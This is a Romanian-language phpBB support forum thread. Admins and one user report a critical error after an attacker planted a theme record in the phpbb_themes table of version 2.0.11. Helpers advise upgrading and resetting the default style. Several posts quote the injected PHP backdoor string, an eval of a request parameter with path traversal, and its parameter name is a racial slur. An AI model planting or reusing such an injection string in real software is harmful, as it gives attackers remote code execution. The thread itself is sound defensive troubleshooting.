[nigga] exploit

[ilie2]

Ma ajuta cineva ?

intr-o dimineata n-a mai functionat forum-ul iar in tabelul phpbb_themes am gasit intr-o inregistrare in coloana template_name textul eval(stripslashes($_REQUEST[nigga]));exit();

E o gaura in securitatea phpBB sau cine a introdus acest text (probabil in forum/admin) oricum nu ar fi putut sa execute un cod scris in template_name ?

Multumesc.

[mihaitza]

Date necesare într-un mesaj...

(vezi link în semnătura mea)

[ilie2]

URL: http://www.masini.ro/forum/ (dar acum nu mai apare eroarea deoarece am refacut tabelul phpbb_themes dintr-un backup)
Stilul folosit: Apalachia
Modificări instalate: chatbox_mod, topics_anywhere
Versiunea phpBB: 2.0.11
Versiunea of PHP: 4.x
Serverul de bază de date şi versiunea: mysql
Serverul de mesagerie (mail), versiunea şi detalii despre acesta (dacă este găzduit în acelaşi loc cu forumul, dacă există probleme):
Hostul: linux
Dacă e instalat de către cineva de la phpbb.ro sau nu: nu
Dacă e un upgrade de la o versiune anterioară: nu
Dacă e o conversie dintr-un alt forum şi care anume: nu
Dacă ai căutat la phpbb.ro rezolvarea prin "Căutare" şi Catalogul de articole: da
Dacă da, ce termeni ai folosit: da (dar n-am gasit nimic)
Descrierea detaliată a problemei:
Cineva (se pare din forum/admin) a adaugat un stil pe forum
deoarece am gasit in tabelul phpbb_themes o inregistrare: in coloana template_name textul aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tmp
, in coloana style_name textul FI Black, in coloana head_stylesheet textul fiblack.css in coloana td_class1 textul row1
Iar daca era selectat acest stil mesajul pe forum era:
phpBB : Critical Error

Could not open aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tmp template config file

DEBUG MODE

Line : 332
File : /www/htdocs/mirabilis-net/www.portal.ro/forum/includes/functions.php


Dacă ai un cont de test pentru noi: nu

[danielt]

Este un atac la tabelele de templateuri. Trebuie neaparat sa faci upgrade la ultima versiune de phpbb. Avertismentele legate de posibile atacuri si rugamintea noastra de a va upgrada forumul nu sunt glume.

[Hazard]

Salut!

Am tot cautat pe forum sa vad daca gasesc rezolvarea la problema mea si sa nu mai fiu nevoit sa deschid acest topic si sa va deranjez... Dar nu am gasit!

Am facut de curand update de la versiunea 2.0.11 la 2.0.13, baza de date a fost actualizata, fisierele la fel... Am verificat, de mai multe ori.

Cod: Selectaţi tot

Updating to latest stable release 
 


Information
Database type    :: mysql
Previous version :: 2.0.11
Updated version  :: 2.0.13

Updating database schema
Progress :: No updates required

Updating data
Progress :: No updates where required

Updating version and optimizing tables
Progress :: . . Done
Result   :: No errors 

Update completed
Please make sure you have updated your board files too, this file is only updating your database.

You should now visit the General Configuration settings page in the Administration Panel and check the General Configuration of the board. If you updated from versions prior to RC-3 you must update some entries. If you do not do this emails sent from the board will contain incorrect information. Don't forget to delete this file!

DAR, pentru ca trebuia sa existe si un DAR, primesc urmatorea eroare:

Cod: Selectaţi tot

phpBB : Critical Error 

Could not open aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tmp template config file

DEBUG MODE

Line : 361
File : functions.php 

Fie ca urmez link-ul catre panoul de administrare, fie ca accesez prima pagina a forumului; acest lucru se poate verifica la http://promusicprod.rockcente.ro ...

Sper sa aiba cineva rezolvarea la problema mea... Sunt disperat, oameni buni!

Numa' bine!

[Hazard]

Tot eu sunt!

De data asta fericit! Am gasit rezolvarea... Nu am timp sa fac traducerea dar daca intampinati aceeasi problema solutia o gasiti aici: http://www.phpbb.com/phpBB/viewtopic.php?t=272959

Daniel, scuze pentru mesajul privat... M-am grabit sa ti-l trimit si... Scuze, din nou!

B-Bye!

[dorin]

Cod: Selectaţi tot

phpBB : Critical Error 

Could not open aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tmp template config file

o eroare pe care eu personal nu am intalnit-o, phpbb versiunea 2.0.11., o fi ceva cu un fisier de template ??

Editat de flowers:
Mesaje asemanatoare unite intr-un singur topic.

[BuGsY]

Rulează acestă linie în SQL:

Cod: Selectaţi tot

UPDATE `phpbb_config` SET `config_value` = '1' WHERE `config_name` = 'default_style'

Faceţi update la versiunea curentă a soft-ului phpBB (2.0.13) dload.php?action=category&cat_id=18

http://www.securityfocus.com/archive/1/ ... 05-03-17/0
http://seclists.org/lists/bugtraq/2005/Mar/0258.html
http://www.phpbb.com/phpBB/viewtopic.php?t=272959

[psihologice]

Sunt PSIHOLOGICE, nou venita pe aici.
Eu nu sunt administrator de forum , ci "consumator" de discutii pe forumul

http://www.apsi.ro/phpBB2/

Am incercat sa imi modific cateva optiuni in profil si imediat dupa ca am dat "submite" nu am mai putut intra pe forum. La orice tentativa de click pe link-ul care altadata imi deschidea forumul (ma autentifica automat) acum imi apare mesajul urmator :

phpBB : Critical Error

Could not open aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tmp template config file

DEBUG MODE

Line : 335
File : /home/apsiro/public_html/phpBB2/includes/functions.php

Ce pot sa fac ? Mentionez ca nu mai pot intra absolut deloc pe forum ca sa imi mai modific optiunile care mi-au facut aceasta bucurie si nici nu am vreo data de contact pentru a-l anunta pe administratorul forumului.

Ma poate ajuta cineva? Fara de forumul acela ma simt ca fara o mana.
Multumesc anticipat !

[gmzionic]

Problema e cu forumul...nu cu tine